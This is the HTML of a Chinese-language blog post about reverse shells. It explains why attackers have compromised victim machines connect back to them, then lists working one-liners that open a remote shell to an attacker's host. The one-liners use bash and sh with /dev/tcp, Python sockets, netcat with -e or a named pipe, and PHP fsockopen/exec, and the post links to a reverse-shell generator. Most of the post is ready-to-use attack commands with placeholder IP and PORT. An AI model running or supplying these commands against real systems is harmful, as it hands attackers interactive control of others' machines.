<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><title>shell反弹 | null</title><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.staticfile.org/font-awesome/4.7.0/css/font-awesome.min.css"><script>var GLOBAL = { 
  root: '/',
  algolia: undefined,
  copy: {
    success: 'Copy successfully',
    error: 'Copy error',
    noSupport: 'The browser does not support'
  }
} </script><link rel="icon" href="/favicon.ico"><meta name="generator" content="Hexo 4.2.1"><link rel="alternate" href="/atom.xml" title="null" type="application/atom+xml">
</head><body><canvas class="fireworks"></canvas><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar"><div class="toggle-sidebar-info text-center"><span data-toggle="Toggle article">Toggle site</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">Catalog</div><div class="sidebar-toc__progress"><span class="progress-notice">You've read</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-4"><a class="toc-link" href="#现在谈一下shell反弹的方法。"><span class="toc-number">1.</span> <span class="toc-text">现在谈一下shell反弹的方法。</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#1-bash反弹"><span class="toc-number">1.1.</span> <span class="toc-text">1. bash反弹</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#2-sh反弹"><span class="toc-number">1.2.</span> <span class="toc-text">2. sh反弹</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#3-Python方式"><span class="toc-number">1.3.</span> <span class="toc-text">3. Python方式</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#4-nc反弹"><span class="toc-number">1.4.</span> <span class="toc-text">4. nc反弹</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#5-php方式"><span class="toc-number">1.5.</span> <span class="toc-text">5.php方式</span></a></li></ol></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="/img/avatar.png"></div><div class="author-info__name text-center">Y0un9</div><div class="author-info__description text-center">Y0un9的博客</div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">Articles</span><span class="pull-right">18</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">Tags</span><span class="pull-right">1</span></a></div></div></div><div id="content-outer"><div id="top-container" style="background-image: url(http://attach.bbs.miui.com/forum/201306/23/110328s72xxse7lfis9fnd.jpg)"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/"></a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus"><a class="site-page" href="/">Home</a><a class="site-page" href="/archives">Archives</a><a class="site-page" href="/tags">Tags</a><a class="site-page" href="/categories">Categories</a></span></div><div id="post-info"><div id="post-title">shell反弹</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2020-05-24 </time></div></div></div><div class="layout" id="content-inner"><article id="post"><div id="post-content"><p>假设我们攻击了一台机器，打开了该机器的一个端口，攻击者在自己的机器去连接目标机器（目标ip：目标机器端口），这是比较常规的形式，我们叫做正向连接。远程桌面，web服务，ssh，telnet等等，都是正向连接。某些情况下正向连接不太好使。</p>
<p>1.某客户机中了你的网马，但是它在局域网内，你直接连接不了。</p>
<p>2.它的ip会动态改变，你不能持续控制。</p>
<p>3.由于防火墙等限制，对方机器只能发送请求，不能接收请求。</p>
<p>4.对于病毒，木马，受害者什么时候能中招，对方的网络环境是什么样的，什么时候开关机，都是未知，所以建立一个服务端，让恶意程序主动连接，才是上策。</p>
<p>那么反弹就很好理解了， 攻击者指定服务端，受害者主机主动连接攻击者的服务端程序，就叫反弹连接。</p>
<h4 id="现在谈一下shell反弹的方法。"><a href="#现在谈一下shell反弹的方法。" class="headerlink" title="现在谈一下shell反弹的方法。"></a>现在谈一下shell反弹的方法。</h4><p>kali：192.168.124.128</p>
<p>centos7：192.168.124.132</p>
<h5 id="1-bash反弹"><a href="#1-bash反弹" class="headerlink" title="1. bash反弹"></a>1. bash反弹</h5><ul>
<li><p>通过 <code>nc -lvp port</code> 监听本机的一个端口号</p>
</li>
<li><p>使用 <code>bash -i &gt;&amp; /dev/tcp/ip/port 0&gt;&amp;1</code><br>或<code>bash -i &gt; /dev/tcp/ip/post 0&gt;&amp;1 2&gt;&amp;1</code></p>
</li>
</ul>
<p>反弹shell。这是经典的反弹shell的语句，这里分析一下原理。</p>
<ol>
<li>使用<code>bash -i</code> 启动交互式shell</li>
<li><code>&gt;&amp;</code> 将stdout 1,stderr 2都指向主机的端口</li>
<li><code>0&gt;&amp;1</code> 将stdin 0 指向主机端口。</li>
</ol>
<ul>
<li>这样0,1,2 都指向了主机端口。受害机通过端口读取主机的命令并执行，将执行的结果输出到主机上。就实现了将受害机的shell弹给主机。</li>
</ul>
<p><img src="/images/pasted-60.png" alt="upload successful"></p>
<p><img src="/images/pasted-59.png" alt="upload successful"></p>
<h5 id="2-sh反弹"><a href="#2-sh反弹" class="headerlink" title="2. sh反弹"></a>2. sh反弹</h5><p>原理和bash反弹相同</p>
<p><code>sh &gt;&amp; /dev/tcp/IP/PORT 0&gt;&amp;1</code></p>
<h5 id="3-Python方式"><a href="#3-Python方式" class="headerlink" title="3. Python方式"></a>3. Python方式</h5><p><code>python -c &quot;import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&#39;ip&#39;,port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([&#39;/bin/bash&#39;,&#39;-i&#39;]);&quot;</code></p>
<p><img src="/images/pasted-61.png" alt="upload successful"></p>
<h5 id="4-nc反弹"><a href="#4-nc反弹" class="headerlink" title="4. nc反弹"></a>4. nc反弹</h5><p>PS：必须服务器安装了nc。可以用<code>nc --help</code>检验</p>
<ul>
<li>存在-e参数时可以直接反弹 </li>
</ul>
<p><code>nc -e /bin/bash ip port</code> </p>
<p><img src="/images/pasted-62.png" alt="upload successful"></p>
<ul>
<li>不存在-e时 </li>
</ul>
<p><code>mknod backpipe p; nc IP PORT 0&lt;backpipe | /bin/bash 1&gt;backpipe 2&gt;backpipe</code></p>
<p><img src="/images/pasted-63.png" alt="upload successful"></p>
<h5 id="5-php方式"><a href="#5-php方式" class="headerlink" title="5.php方式"></a>5.php方式</h5><p><code>php -r &#39;exec(&quot;/bin/bash -i &gt;&amp; /dev/tcp/IP/PORT&quot;)&#39;</code></p>
<p>或</p>
<p><code>php -r &#39;$sock=fsockopen(&quot;IP&quot;,PORT);exec(&quot;/bin/bash -i 0&gt;&amp;3 1&gt;&amp;3 2&gt;&amp;3&quot;);&#39;</code></p>
<p><a href="https://krober.biz/misc/reverse_shell.php" target="_blank" rel="noopener">附上一个shell反弹的神器</a></p>
</div><div class="post-meta__tag-list"></div></article><nav id="pagination"><div class="prev-post pull-left"><a href="/2020/05/26/CISCN2018-loveMath/"><i class="fa fa-chevron-left">  </i><span>CISCN2018-loveMath</span></a></div><div class="next-post pull-right"><a href="/2020/05/24/%E6%96%87%E4%BB%B6%E6%8F%8F%E8%BF%B0%E7%AC%A6%E4%B8%8E%E9%87%8D%E5%AE%9A%E5%90%91/"><span>文件描述符与重定向</span><i class="fa fa-chevron-right"></i></a></div></nav></div></div><footer><div class="layout" id="footer"><div class="copyright">©2013 - 2020 By Y0un9</div><div class="framework-info"><span>Driven - </span><a href="http://hexo.io" target="_blank" rel="noopener"><span>Hexo</span></a><span> |  </span><span>Theme - </span><a href="https://github.com/Molunerfinn/hexo-theme-melody" target="_blank" rel="noopener"><span>Melody</span></a></div><div class="busuanzi"><script async src="//dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file-o"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="/js/third-party/anime.min.js"></script><script src="/js/third-party/jquery.min.js"></script><script src="/js/third-party/jquery.fancybox.min.js"></script><script src="/js/third-party/velocity.min.js"></script><script src="/js/third-party/velocity.ui.min.js"></script><script src="/js/utils.js"></script><script src="/js/fancybox.js"></script><script src="/js/sidebar.js"></script><script src="/js/copy.js"></script><script src="/js/fireworks.js"></script><script src="/js/transition.js"></script><script src="/js/scroll.js"></script><script src="/js/head.js"></script></body></html>